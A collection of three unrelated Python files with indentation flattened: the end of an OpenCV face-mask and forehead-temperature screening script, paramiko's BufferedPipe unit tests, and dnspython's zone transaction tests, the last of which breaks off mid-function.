print("[INFO] Thermal mode: OFF")
# Start the thermal subprocess
if THERMAL_MODE:
shared_dict['thermal_data'] = None
shared_dict['thermal_frame'] = None
thermal_grabber_process = multiprocessing.Process(target=thermal_grabber_worker, args=(shared_dict, thermal_program_path, FLIP_THERMAL))
thermal_grabber_process.start()
output_window = 'Mask Detecting Stream (Thermal)'
else:
output_window = 'Mask Detecting Stream'
# Start the facemask subprocess
facemask_process = multiprocessing.Process(target=facemask_worker, args=(shared_dict, args["face"], args["model"], args["confidence"]))
facemask_process.start()
# Process the thermal data and take an average temperature from the forehead
def process_thermal_data(thermal_data, start_point, end_point):
measure_point_x, measure_point_y = (start_point[0] + ((end_point[0] - start_point[0]) // 2)), (start_point[1] + ((end_point[1] - start_point[1]) // 6))
# Create a margin for a larger sample size.
x_margin = ((end_x - start_x)/5)
y_margin = ((end_y - start_y)/20)
# Scale the margin for use on the thermal data.
x_margin_scaled = x_margin // THERMAL_SCALE_FACTOR
y_margin_scaled = y_margin // THERMAL_SCALE_FACTOR
# Scale the measuring points for use on the thermal data.
measure_point_x_scaled = measure_point_x // THERMAL_SCALE_FACTOR
measure_point_y_scaled = measure_point_y // THERMAL_SCALE_FACTOR
# Get all thermal data from within our margin box.
measure_point_data = thermal_data[int(measure_point_y_scaled-y_margin_scaled):int(measure_point_y_scaled+y_margin_scaled), int(measure_point_x_scaled-x_margin_scaled):int(measure_point_x_scaled+x_margin_scaled)]
avg_temp = np.average(measure_point_data)*THERMAL_CONVERSION+temp_offset
label_avg_temp = str(round(avg_temp, 1)) + " C"
temperature_bound = ((int((measure_point_x-x_margin)*frame_scale), int((measure_point_y-y_margin)*frame_scale)),
(int((measure_point_x+x_margin)*frame_scale), int((measure_point_y+y_margin)*frame_scale)))
return avg_temp, label_avg_temp, temperature_bound
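# Worked example of the conversion above (constants are defined earlier in
# this file; the raw value is chosen purely for illustration):
#
#   raw_avg = 3900                                      # averaged Lepton reading
#   temp_c = raw_avg * THERMAL_CONVERSION + temp_offset
#   # 3900 * 0.0092 + 0 = 35.88, displayed as "35.9 C"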
# Resize frame to fit fullscreen, keeping aspect ratio
def fullscreen_resize(frame):
frame_height, frame_width = frame.shape[:2]
scale_width = float(MONITOR_INFO.width)/float(frame_width)
scale_height = float(MONITOR_INFO.height)/float(frame_height)
if scale_height>scale_width:
frame_scale = scale_width
else:
frame_scale = scale_height
new_x, new_y = frame.shape[1]*frame_scale, frame.shape[0]*frame_scale
frame = cv2.resize(frame,(int(new_x),int(new_y)), interpolation=cv2.INTER_NEAREST)
# Allows us to pad the frame later to centre align it.
frame_width_diff = MONITOR_INFO.width - new_x
frame_height_diff = MONITOR_INFO.height - new_y
return frame, frame_scale, (frame_width_diff, frame_height_diff)
# MAIN DRIVER LOOP
while True:
# Read frame from webcam.
_, webcam_frame = webcam_cap.read()
# Get the thermal data/frame from the thermal grabber subprocess.
thermal_status = False
if THERMAL_MODE:
# Retrieve thermal info from the subprocess
thermal_data, thermal_frame, resync_count = shared_dict['thermal_data'], shared_dict['thermal_frame'], shared_dict['resync_count']
# If there is no thermal data available or the thermal camera is in a resync state, turn thermal mode off temporarily
if thermal_data is None or thermal_frame is None or resync_count > 6:
thermal_status = False
else:
thermal_status = True
# If thermal mode is not active set default values.
else:
thermal_data, thermal_frame, resync_count = None, None, 0
# Pass frame for processing
shared_dict['frame'] = webcam_frame
# Show the thermal frame overlaid on top of the webcam frame.
if thermal_status and thermal_overlay:
alpha = 0.35
beta = (1.0 - alpha)
output_frame = cv2.addWeighted(thermal_frame, alpha, webcam_frame, beta, 0.0)
else:
output_frame = webcam_frame
# Resize fullscreen output, keeping aspect ratio intact.
frame_scale = 1
if fullscreen_mode:
output_frame, frame_scale, frame_diff = fullscreen_resize(output_frame)
#TEXT_SCALE = 0.5 + (0.5 * frame_scale)
TEXT_SCALE = frame_scale
# If in debug mode show the ambient/room temperature.
if thermal_status and debug:
average_temperature = np.average(thermal_data)*THERMAL_CONVERSION+temp_offset
cv2.putText(output_frame, "Ambient: " + str(round(average_temperature,1)) + " C", (int(35 * TEXT_SCALE), int(35 * TEXT_SCALE)),
GUI_FONT, TEXT_SCALE, (255,255,255), 2, cv2.LINE_AA)
# If in debug mode show the thermal offset value.
if debug and temp_offset != 0:
cv2.putText(output_frame, "Offset: " + str(temp_offset) + " C", (int(35 * TEXT_SCALE), int(70 * TEXT_SCALE)),
GUI_FONT, TEXT_SCALE, (255,255,255), 2, cv2.LINE_AA)
# Detect faces in the frame and determine if they are wearing a face mask or not.
(locs, preds) = shared_dict['locs'], shared_dict['preds']
# Loop over the detected face locations and their corresponding locations.
for (box, pred) in zip(locs, preds):
# Unpack the face bounding box and facemask predictions.
(start_x, start_y, end_x, end_y) = box
(withoutMask, mask) = pred
# If there is thermal data available, get the forehead temperature.
avg_temp = None
if thermal_status:
avg_temp, label_avg_temp, temperature_bound = process_thermal_data(thermal_data, (start_x, start_y), (end_x, end_y))
# If there is no thermal data available display a message to the user prompting them to wait.
elif THERMAL_MODE:
cv2.rectangle(output_frame, (0, 0), (output_frame.shape[1], output_frame.shape[0]//5), (0,0,0), -1, cv2.LINE_AA)
cv2.putText(output_frame, "Waiting for thermal camera...", (output_frame.shape[0]//10, output_frame.shape[0]//10),
GUI_FONT, 1, (255,255,255), 2, cv2.LINE_AA)
# Scale bounding box by the fullscreen scaling
if fullscreen_mode:
start_x, start_y, end_x, end_y = int(start_x * frame_scale), int(start_y * frame_scale), int(end_x * frame_scale), int(end_y * frame_scale)
# Determine the class label and color we'll use to draw the bounding box and text
mask_label = "Mask" if mask > withoutMask else "No Mask"
mask_colour = SUCCESS_COLOUR if mask_label == "Mask" else WARNING_COLOUR
# Confidence interval for the predictions.
if mask < FACEMASK_CONFIDENCE and withoutMask < FACEMASK_CONFIDENCE:
mask_label = "Look at the camera please!"
mask_colour = UNKNOWN_COLOUR
# Display appropriate messages to the user
elif thermal_status:
# If wearing mask and normal body temperature
if mask > FACEMASK_CONFIDENCE and (avg_temp > TEMP_MINIMUM and avg_temp < TEMP_FEVER):
message_label = "You may enter!"
temperature_colour = SUCCESS_COLOUR
message_colour = SUCCESS_COLOUR
# If not wearing a mask and normal body temperature
elif withoutMask > FACEMASK_CONFIDENCE and (avg_temp > TEMP_MINIMUM and avg_temp < TEMP_FEVER):
message_label = "Please wear a mask!"
temperature_colour = SUCCESS_COLOUR
message_colour = WARNING_COLOUR
# Fever alert (outside of normal body temperature)
elif (avg_temp >= TEMP_FEVER):
message_label = "FEVER WARNING!"
secondary_label = "DO NOT ENTER"
temperature_colour = WARNING_COLOUR
message_colour = WARNING_COLOUR
mask_colour = WARNING_COLOUR
# Warning outline to differentiate from background
cv2.putText(output_frame, secondary_label, (start_x, int(end_y + (30 * TEXT_SCALE))),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Large warning
cv2.putText(output_frame, secondary_label, (start_x, int(end_y + (30 * TEXT_SCALE))),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, message_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
# User is too cold to get accurate temperature
else:
message_label = "Heat up and try again!"
temperature_colour = COLD_COLOUR
message_colour = COLD_COLOUR
# Display temperature box
cv2.rectangle(output_frame, temperature_bound[1], temperature_bound[0], temperature_colour, 1, cv2.LINE_AA)
# Message outline to differentiate from background
cv2.putText(output_frame, message_label, (start_x, start_y - int(70 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Display message assigned above
cv2.putText(output_frame, message_label, (start_x, start_y - int(70 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, message_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
# Temperature outline to differentiate from background
cv2.putText(output_frame, label_avg_temp, (start_x, start_y - int(40 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Display body temperature
cv2.putText(output_frame, label_avg_temp, (start_x, start_y - int(40 * TEXT_SCALE)),
cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, temperature_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
# Include the probability in the label
mask_label = "{}: {:.2f}%".format(mask_label, max(mask, withoutMask) * 100)
# Label outline to differentiate from background
cv2.putText(output_frame, mask_label, (start_x, start_y - int(10 * TEXT_SCALE)), cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, (0,), int(4*TEXT_SCALE), cv2.LINE_AA)
# Display the label and bounding box rectangle on the output
cv2.putText(output_frame, mask_label, (start_x, start_y - int(10 * TEXT_SCALE)), cv2.FONT_HERSHEY_DUPLEX, TEXT_SCALE, mask_colour, int(2*TEXT_SCALE), cv2.LINE_AA)
cv2.rectangle(output_frame, (start_x, start_y), (end_x, end_y), mask_colour, 2, cv2.LINE_AA)
# Facemask detection loading screen
if not shared_dict['facemask_detector_status']:
cv2.rectangle(output_frame, (0, 0), (output_frame.shape[1], output_frame.shape[0]//5), (0,0,0), -1, cv2.LINE_AA)
cv2.putText(output_frame, "Face mask detection is loading...", (output_frame.shape[0]//10, output_frame.shape[0]//10),
GUI_FONT, TEXT_SCALE, (255,255,255), 2, cv2.LINE_AA)
# Draw fullscreen window or standard window depending on mode
if fullscreen_mode:
# Centre align frame
frame_h_padding = int(frame_diff[1]//2)
frame_w_padding = int(frame_diff[0]//2)
output_frame = cv2.copyMakeBorder(output_frame, frame_h_padding, frame_h_padding, frame_w_padding, frame_w_padding, cv2.BORDER_CONSTANT, value=(0,))
cv2.namedWindow(output_window, cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty(output_window, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
else:
cv2.namedWindow(output_window, cv2.WND_PROP_AUTOSIZE)
cv2.setWindowProperty(output_window, cv2.WND_PROP_AUTOSIZE, cv2.WINDOW_NORMAL)
cv2.imshow(output_window, output_frame)
# Get key press
key = cv2.waitKey(1)
# Quit key
if key == ord('q'):
break
# Toggle debug mode (ambient temperature and offset shown)
if key == ord('d'):
debug = not debug
print("[INFO] Debug mode: " + str(debug))
# Toggle thermal overlay
elif key == ord('o') and THERMAL_MODE:
thermal_overlay = not thermal_overlay
print("[INFO] Thermal overlay: " + str(thermal_overlay))
# Change thermal offset
elif key == ord('u') and THERMAL_MODE:
temp_offset += 0.25
print("[INFO] Temperature offset (+0.25 C): " + str(temp_offset) + " C")
elif key == ord('j') and THERMAL_MODE:
temp_offset -= 0.25
print("[INFO] Temperature offset (-0.25 C): " + str(temp_offset) + " C")
elif key == ord('r') and THERMAL_MODE:
temp_offset = TEMP_OFFSET_ORG
print("[INFO] Temperature offset reset to: " + str(temp_offset) + " C")
# Toggle fullscreen
elif key == ord('f'):
fullscreen_mode = not fullscreen_mode
cv2.destroyWindow(output_window)
print("[INFO] Fullscreen mode: " + str(fullscreen_mode))
print("[INFO] Thank you for using mask detection!")
# Clean up and shutdown
facemask_process.terminate()
if THERMAL_MODE:
shared_dict['thermal_process_terminate'] = True
thermal_grabber_process.join()
cv2.destroyAllWindows()
|
test_buffered_pipe.py
|
# Copyright (C) 2006-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Some unit tests for BufferedPipe.
"""
import threading
import time
import unittest
from paramiko.buffered_pipe import BufferedPipe, PipeTimeout
from paramiko import pipe
from paramiko.py3compat import b
def delay_thread(p):
p.feed('a')
time.sleep(0.5)
p.feed('b')
p.close()
def close_thread(p):
time.sleep(0.2)
p.close()
class BufferedPipeTest(unittest.TestCase):
def test_1_buffered_pipe(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
p.feed('hello.')
self.assertTrue(p.read_ready())
data = p.read(6)
self.assertEqual(b'hello.', data)
p.feed('plus/minus')
self.assertEqual(b'plu', p.read(3))
self.assertEqual(b's/m', p.read(3))
self.assertEqual(b'inus', p.read(4))
p.close()
self.assertTrue(not p.read_ready())
self.assertEqual(b'', p.read(1))
def test_2_delay(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
threading.Thread(target=delay_thread, args=(p,)).start()
self.assertEqual(b'a', p.read(1, 0.1))
try:
p.read(1, 0.1)
self.assertTrue(False)
except PipeTimeout:
pass
self.assertEqual(b'b', p.read(1, 1.0))
self.assertEqual(b'', p.read(1))
def test_3_close_while_reading(self):
p = BufferedPipe()
threading.Thread(target=close_thread, args=(p,)).start()
data = p.read(1, 1.0)
self.assertEqual(b'', data)
def test_4_or_pipe(self):
p = pipe.make_pipe()
p1, p2 = pipe.make_or_pipe(p)
self.assertFalse(p._set)
p1.set()
self.assertTrue(p._set)
p2.set()
self.assertTrue(p._set)
p1.clear()
self.assertTrue(p._set)
p2.clear()
self.assertFalse(p._set)
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text("example"), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text("content", 300, "in", "txt", "content")
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.1", "10.0.0.2")
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.3", "10.0.0.4")
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text("content", None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b"content",)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.1", "10.0.0.2")
txn.add(rrset)
rrset2 = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.3", "10.0.0.4")
txn.add(rrset2)
expected = dns.rrset.from_text(
"foo", 300, "in", "a", "10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4"
)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.1", "10.0.0.2")
txn.add(rrset)
rrset2 = dns.rrset.from_text("foo", 300, "in", "a", "10.0.0.3", "10.0.0.4")
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text("nonexistent", None))
content = dns.name.from_text("content", None)
content2 = dns.name.from_text("content2", None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text("content", 300, "in", "txt", "new-content")
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text("content2", 300, "in", "txt", "new-content")
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text("content", 300, "in", "txt", "bad-content")
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text("content2", 300, "in", "txt", "bad-content")
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text("content", 300, "in", "txt", "content")
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text("foo", None)
rdataset = dns.rdataset.from_text("in", "a", 300, "10.0.0.1", "10.0.0.2")
rdata1 = dns.rdata.from_text("in", "a", "10.0.0.3")
rdata2 = dns.rdata.from_text("in", "a", "10.0.0.4")
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text(
"foo", 30, "in", "a", "10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4"
)
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text("bar", 300, "in", "txt", "bar")
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text("foo", None)
rdata = dns.rdata.from_text("in", "a", "10.0.0.3")
txn.add(foo, 0x100000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, "hi")
with pytest.raises(TypeError):
txn.add(foo, "hi")
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text("foo", 300, "in", "SOA", ". . 1 2 3 4 5")
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text("bar.foo", None))
rd = dns.rdata.from_text("in", "ns", "ns3")
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text("in", "a", "10.0.0.3")
txn.add(dns.name.from_text("ns3", None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None))
txn.rollback()
assert zone.get_node("bar.foo") is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None))
txn.commit()
assert zone.get_node("bar.foo") is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text("bar.foo", None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add("bar.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace("bar.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get("bar.foo", "in", "mx")
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact("bar.foo")
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists("bar.foo")
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("unknown.bar.foo", None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text("bar.foo", None), "txt")
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add("bar.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add("foo.foo", 300, dns.rdata.from_text("in", "txt", "hi"))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text("in", "ns", 300, "ns1", "ns2")
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text("in", "ns", "ns3")
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text("in", "ns", 300, "ns1", "ns2", "ns3")
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text("ns1", None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text("ns99", None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text("a99", None)
a100 = dns.name.from_text("a100", None)
a101 = dns.name.from_text("a101", None)
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text("ns1", None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text("a99", None)
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text("a99", None)
rds = dns.rdataset.from_text("in", "a", 300, "10.99.99.99")
txn.add(a99, rds)
assert zone.get_rdataset("a99", "a") == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text("ns1", None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text("ns2", None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text("ch", "ns", 300, "ns1", "ns2")
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xFFFFFFFF, False)
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 0xFFFFFFFF
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset("@", "soa")
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text("unknown", None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text("a99.example.")
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text("a99.not-example.")
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_iteration_in_replacement_txn(zone):
rds = dns.rdataset.from_text("in", "a", 300, "1.2.3.4", "5.6.7.8")
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_commit(zone):
rds = dns.rdataset.from_text("in", "a", 300, "1.2.3.4", "5.6.7.8")
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
with zone.reader() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_get(zone):
with zone.writer(True) as txn:
rds = txn.get(dns.name.empty, "soa")
assert rds is None
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text("in", "ns", 300, "ns1", "ns2")
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset("@", "soa")
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get("@", "soa")
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get("@", "soa")
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(
dns.name.empty, dns.rdatatype.SOA, dns.rdatatype.NONE
)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(
